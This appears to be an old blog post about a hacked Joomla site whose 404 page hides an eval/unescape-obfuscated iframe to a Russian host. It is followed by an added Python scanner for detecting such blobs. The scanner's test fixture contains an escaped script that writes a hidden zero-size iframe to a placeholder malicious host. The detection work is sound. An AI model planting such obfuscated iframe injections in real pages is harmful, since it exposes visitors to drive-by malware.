I came across a hacked site today. Turns out it was based on an older version of Joomla. That MIGHT be where the hackers got in, but not necessarily. I checked on that site a few weeks ago (there’s actually still a Google cache from back then, Jan 20, 2009), and back then I first thought something was wrong with the software, and then eventually found that the database server was down. I hadn’t been back until today.
(name of site removed) is a website belonging to a guy who writes books and articles on stalking, cyberstalking, bullying and online security. These days I don’t normally include the name of the sites that have been hacked, but this time I couldn’t resist. The security guy got hacked (OK, he says he’s not a security guy; I just thought it sounded good…). I’m sure this will be fodder for a great new article from the security guy!
He’s got lots of pages visible in Google from when the site was operational (as late as February 22, 2009). But now all those pages redirect to the root page. If you check index.html, you get a normal 404 error page, but index.php is a hacked 404 error page, that contains the hacked code.
The code is unescaped text using eval. It’s an iframe pointing to a Russian site. I never got so far as to see what was there, because my anti-virus dislikes the code. The source code on the page complains that the template file can’t be found. These hacks quite often pull in the code dynamically from a different website, so the code you see when you access the website might not be what’s hidden in the hacked site (in other words, finding the hacked code isn’t easy - better remove everything and reupload from your computer). And the exploit itself (usually a file that will infect a visiting computer) might be on a third site.
Here’s an image containing (first part) the code I found on the page, prior to the unescaped string, and (last part) what that string decoded to.

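The pattern described above (an eval of an unescaped string that writes a hidden iframe) can be checked for offline. The following is an added example, not code from the post or the hacked site: a small scanner that finds `eval(unescape('...'))` blobs in a page, decodes them the way the browser would, and reports any iframe targets hidden inside. The sample page and the target host are constructed placeholders.

```python
import re

# Added example (not code from the original post): find eval(unescape(...))
# blobs, decode them as a browser would, and report hidden iframe targets.

def js_unescape(s):
    """Mimic JavaScript unescape(): %uXXXX UTF-16 units and %XX bytes."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)

EVAL_UNESCAPE = re.compile(
    r"eval\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1\s*\)", re.S)
IFRAME_SRC = re.compile(r"<iframe[^>]*\bsrc\s*=\s*['\"]?([^'\" >]+)", re.I)

def scan_page(html):
    """Return one finding per eval(unescape(...)) call present in html."""
    findings = []
    for m in EVAL_UNESCAPE.finditer(html):
        decoded = js_unescape(m.group(2))
        findings.append({
            "offset": m.start(),          # where in the file the blob sits
            "decoded": decoded,           # what the browser would execute
            "iframe_src": IFRAME_SRC.findall(decoded),
        })
    return findings

# Constructed sample page: a 404 template with an injected script.
# The host is a placeholder, not the site the post describes.
_HIDDEN = ('document.write(\'<iframe src="http://malicious.example.invalid/in.cgi?3" '
           'width="0" height="0" style="visibility:hidden"></iframe>\')')
_ESCAPED = "".join("%%%02X" % ord(c) for c in _HIDDEN)   # what escape() yields
SAMPLE_PAGE = ("<html><body><h1>404 Not Found</h1>\n"
               "<script>eval(unescape('" + _ESCAPED + "'))</script>\n"
               "</body></html>")

if __name__ == "__main__":
    for f in scan_page(SAMPLE_PAGE):
        print("obfuscated script at offset", f["offset"])
        print("  decodes to:", f["decoded"][:60], "...")
        print("  hidden iframe target(s):", f["iframe_src"])
```

Run it over every .php and .html file on the server rather than the rendered page, since, as noted above, what the browser receives may be pulled in from elsewhere and differ from what sits on disk.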
This hack has been mentioned online as early as 2007 and again a year ago, and it’s been mentioned as serving malware, but this site was hacked recently, as far as I know. According to others who had this happen to them, the hack was done through PHP scripts uploaded by clients. I checked other domains currently on the same server, and they do not appear to be affected.
Here’s an analysis of who is behind this (Nov 2007)